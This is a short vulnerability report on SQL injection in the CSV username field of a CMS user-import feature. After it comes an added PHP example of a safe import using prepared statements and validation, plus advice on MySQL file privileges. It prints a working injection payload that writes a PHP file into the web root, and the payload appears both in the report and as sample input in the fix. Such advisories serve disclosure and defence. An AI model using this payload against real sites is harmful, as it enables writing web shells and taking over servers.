After the administrator logs in, when adding a new user, choose to import the CSV file; there is SQL injection in the CSV file's username.
The CSV file is as follows:
test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234
If MySQL has writable permissions, this CSV file will create a new phpinfo file in the website directory.
The POST file is:
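Added example, not part of the original report and not HCMS code: a CSV user import that binds every field through a prepared statement and validates the row first, so the username from the report is rejected and could only ever be stored as data. The `importUsers` function, the `users` table, the column order and the username policy are assumptions made for illustration.

```php
<?php
// Added example, not HCMS code. Column order and the users table are assumptions.
declare(strict_types=1);

// Constructed sample input: row 1 is the CSV line from the report, row 2 is benign.
const SAMPLE_CSV = <<<'CSV'
test'/**/union/**/select/**/'<?php phpinfo(); ?>'/**/into/**/outfile/**/'C:\\phpstudy_pro\\WWW\\hcms\\info.php'#, test, test, 123@qwe.com, test1234
alice, Alice, Smith, alice@example.com, S3cretPass
CSV;

function importUsers(PDO $db, string $csv): array
{
    // Placeholders keep every CSV field as data; it is never parsed as SQL text.
    $stmt = $db->prepare(
        'INSERT INTO users (username, first_name, last_name, email, password_hash)
         VALUES (?, ?, ?, ?, ?)'
    );
    $report = ['imported' => [], 'rejected' => []];
    foreach (preg_split('/\R/', trim($csv)) as $i => $line) {
        $row = array_map('trim', str_getcsv($line, ',', '"', ''));
        // Defense in depth: fixed column count, allowlisted username, valid e-mail.
        $ok = count($row) === 5
            && preg_match('/^[A-Za-z0-9_.-]{3,32}$/', $row[0]) === 1
            && filter_var($row[3], FILTER_VALIDATE_EMAIL) !== false;
        if (!$ok) {
            $report['rejected'][] = $i + 1;   // record the line number only
            continue;
        }
        $row[4] = password_hash($row[4], PASSWORD_DEFAULT);
        $stmt->execute($row);
        $report['imported'][] = $row[0];
    }
    return $report;
}

// In-memory SQLite keeps the demo offline; with the mysql driver, also set
// PDO::ATTR_EMULATE_PREPARES to false so binding happens on the server.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT UNIQUE, first_name TEXT,
           last_name TEXT, email TEXT, password_hash TEXT)');

print_r(importUsers($db, SAMPLE_CSV));
```

The file write described in the report also depends on the database account holding MySQL's `FILE` privilege and on `secure_file_priv` allowing the target directory, so removing that privilege from the application account limits the impact of any injection that remains.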